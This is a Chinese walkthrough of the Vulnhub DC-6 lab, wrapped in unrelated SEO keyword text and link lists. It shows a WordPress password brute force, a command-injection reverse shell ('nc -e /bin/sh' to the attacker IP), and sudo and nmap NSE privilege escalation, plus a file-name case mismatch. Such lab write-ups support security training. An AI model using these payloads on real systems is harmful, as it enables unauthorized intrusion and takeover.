当前位置: 首页 > news >正文

求一个全部用div做的网站网站弹窗广告怎么做

求一个全部用div做的网站,网站弹窗广告怎么做,网站开发维护公司,软件技术专业简介文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip kali:192.168.144.148 DC-6:192.168.144.154 靶机描述:选择带k01的密码后面会用到 访问192.168.144.154&…

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip
kali:192.168.144.148
DC-6:192.168.144.154

靶机描述:选择带k01的密码后面会用到
在这里插入图片描述

访问192.168.144.154,地址栏上方的ip变成了域名http://wordy,添加host文件
在这里插入图片描述


二、渗透流程

nmap -A -T5 -sV -sT -p- 192.168.144.154

在这里插入图片描述

思路:
1、80端口

目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……

目录扫描结果:
http://wordy/wp-login.php		#后台管理页面
http://wordy/wp-includes/		#网站目录
#指纹探测
whatweb  http://wordy

在这里插入图片描述

思路:web站点是Wordpress CMS

1、Wordpress版本漏洞
2、Wordpress插件漏洞
3、后台地址,账号密码爆破

#枚举网站用户
wpscan --url http://wordy -e u

在这里插入图片描述

#利用枚举到的网站用户名进行爆破
#筛选出有k01的密码保存到新的字典passwords.txt中
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy  -U "admin","mark","jens","sarch","graham" -P passwords.txt

在这里插入图片描述

#ssh登录失败
ssh mark@192.168.144.154

在这里插入图片描述

登录后台管理页面
用户名:密码     mark:helpdesk01
管理页面地址:http://wordy/wp-login.php

在这里插入图片描述

#Activity monitor组件
searchsploit activity monitor
#后两个命令注入和远程代码执行都可以加以利用

在这里插入图片描述

#查看45274.html
命令1:cat /usr/share/exploitdb/exploits/php/webapps/45274.html
命令2:file:///usr/share/exploitdb/exploits/php/webapps/45274.html
#修改45274.html
cp /usr/share/exploitdb/exploits/php/webapps/45274.html  45274.html
vim 45274.html
#修改为如下内容

在这里插入图片描述

#kali开启监听
nc -lnvp 4444
#浏览器访问45274.html,点击submit,反弹shell未成功

在这里插入图片描述

点击Lookup按钮,抓包

在这里插入图片描述

#burpsuite抓包
修改命令为127.0.0.1 | nc -e /bin/sh 192.168.144.148 4444
反弹shell成功

在这里插入图片描述在这里插入图片描述

#利用python切换到bash环境
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

cat /home/mark/stuff/things-to-do.txt
#该文件下存在账号密码:graham - GSo7isUM1D4

在这里插入图片描述

#利用获取的账号密码登录
ssh graham@192.168.144.154

在这里插入图片描述

sudo -l
cat /home/jens/backups.sh
#backups.sh文件内容是对网站的打包命令,作用是备份网站根目录。

在这里插入图片描述

sudo -l
#jens用户不需要密码就可以执行backups.sh文件

在这里插入图片描述

echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh

在这里插入图片描述

sudo -l		#显示当前用户可以用sudo执行哪些命令
#在jens的shell下,可以在不需要密码的情况下,以root的身份权限执行nmap
#利用nmap的--script参数执行反弹shell脚本
echo 'os.execute("/bin/sh")' > getShell.nse
sudo nmap --script=./getshell.nse

在这里插入图片描述

这里有个问题:获取到root权限之后,页面输入的命令看不见,但是可以执行。
在这里插入图片描述


三、思路总结

1、信息收集
2、暴力破解登录Wordpress后台
3、利用Wordpress CMS组件漏洞反弹shell
4、ssh远程登录后寻找可以执行sudo命令的操作
5、写入nmap反弹shell脚本

http://www.yayakq.cn/news/36230/

相关文章:

  • 好看的网站都找谁做的上海网站推广
  • 做的网站如何全屏开封seo推广
  • 专业做苗木的网站程序员做情侣网站
  • 廊坊网站快速排名优化合肥做网站的价格
  • 有什么网站可以接淘宝设计单做百姓网免费招聘信息
  • 网页设计难还是网站建设南宁波网站建站
  • 做视觉影像网站用什么软件系统好姑娘免费高清视频
  • 谷歌浏览器网页版入口seo短视频新地址在哪里?
  • 一个人完成网站建设中国空间站官网
  • 食品网站建设策划书微博关键词排名优化
  • 建平县营商环境建设局网站网站知识介绍
  • 网站建设哪个平台好英语网站大全免费
  • 眉山建网站毕业设计都是做网站吗
  • 石家庄网站seo服务推广手段有哪些方式
  • 百度贴吧首页上海网站建设优化公司
  • 百度xml网站地图呼市做网站建设的公司哪家好
  • 外贸网站索引页多青岛网站建设服务中心
  • qq做兼职给网站给你网页版微信聊天记录会被监控吗
  • 深圳网站建设机构编程怎样自学
  • dw可以做网站后台吗麦田一葱 wordpress
  • 如何取得网站的管理权限有没有可以做网站动图的软件
  • 百度云建设网站wordpress vantage主题
  • 广告公司做的网站图片侵权用自己网站做邮箱域名
  • 怎么在阿里云上做网站网站开发方案
  • 广州海佳网络网站建设公司怎么样wordpress调用菜单函数
  • 免费网站建设代理5ucms怎样做网站自适应
  • 杭州市住房与城乡建设部网站做一个企业网站需要多长时间
  • wordpress微信网站施工企业的期间费用包括哪些
  • 商城网站建设服务器网站建设竞标ppt
  • 海口网站建设方案优化企业网页建设公司怎样收费